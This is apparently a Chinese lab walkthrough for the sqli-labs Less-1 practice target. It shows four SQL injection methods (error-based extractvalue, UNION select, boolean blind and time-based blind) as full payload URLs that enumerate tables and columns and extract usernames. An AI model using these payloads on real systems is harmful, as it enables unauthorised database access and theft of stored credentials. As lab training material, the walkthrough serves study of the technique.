方法一:报错注入extractvalue()
判断注入点:输入单引号,发现页面报错
http://172.16.173.131/sqli-labs/Less-1/?id=1'
闭合前一个单引号,注释掉后一个,并加入判断payloadhttp://172.16.173.131/sqli-labs/Less-1/?id=1' and 1=1--+
所以利用extractvalue()报错注入
先判断函数是否可执行http://172.16.173.131/sqli-labs/Less-1/?id=1' and extractvalue(1,md5(123));--+
获取version()、database()、user()等信息http://172.16.173.131/sqli-labs/Less-1/?id=1' and extractvalue(1,concat(0x7e,database()));--+
获取表名:http://172.16.173.131/sqli-labs/Less-1/?id=1' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)));--+
获取users的列名http://172.16.173.131/sqli-labs/Less-1/?id=1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1)));--+
获取每列(id、username、password)的内容http://172.16.173.131/sqli-labs/Less-1/?id=1' and extractvalue(1,concat(0x7e,(select username from security.users limit 0,1)));--+
方法二:联合注入
判断注入点:输入单引号,发现页面报错
http://172.16.173.131/sqli-labs/Less-1/?id=1'
order by 判断有几列http://172.16.173.131/sqli-labs/Less-1/?id=1' order by 3--+
union select 联合注入http://172.16.173.131/sqli-labs/Less-1/?id=1' and 1=2 union select 11,22,33--+
判断数据库名称:http://172.16.173.131/sqli-labs/Less-1/?id=1' and 1=2 union select 11,database(),33--+
获取security的表名:http://172.16.173.131/sqli-labs/Less-1/?id=1' and 1=2 union select 11,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),33--+
获取列名:http://172.16.173.131/sqli-labs/Less-1/?id=1' and 1=2 union select 11,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1)),33--+
获取每列(id、username、password)的内容:http://172.16.173.131/sqli-labs/Less-1/?id=1' and 1=2 union select 11,concat(0x7e,(select username from security.users limit 1,1)),33--+
方法3:回显布尔注入(ascii逐位判断)
判断注入点:输入单引号,发现页面报错
http://172.16.173.131/sqli-labs/Less-1/?id=1'
http://172.16.173.131/sqli-labs/Less-1/?id=1' and 1=1--+
获取数据库名:
利用ascii逐位判断,更改substr()第二参数1~nhttp://172.16.173.131/sqli-labs/Less-1/?id=1' and ascii(substr(database(),1,1))=115--+
获取表名(emails\referers\uagents\users):http://172.16.173.131/sqli-labs/Less-1/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101--+
获取users列名:http://172.16.173.131/sqli-labs/Less-1/?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105--+
获取每列(id、username、password)的内容http://172.16.173.131/sqli-labs/Less-1/?id=1' and ascii(substr((select username from security.users limit 0,1),1,1))>65--+
方法4:时间盲注(sleep()、if())
if((条件),m,n)语句:若条件为真 返回m,若条件为假 返回n;
获取数据库名:http://172.16.173.131/sqli-labs/Less-1/?id=1' and sleep(if((ascii(substr(database(),1,1))=115),5,0))--+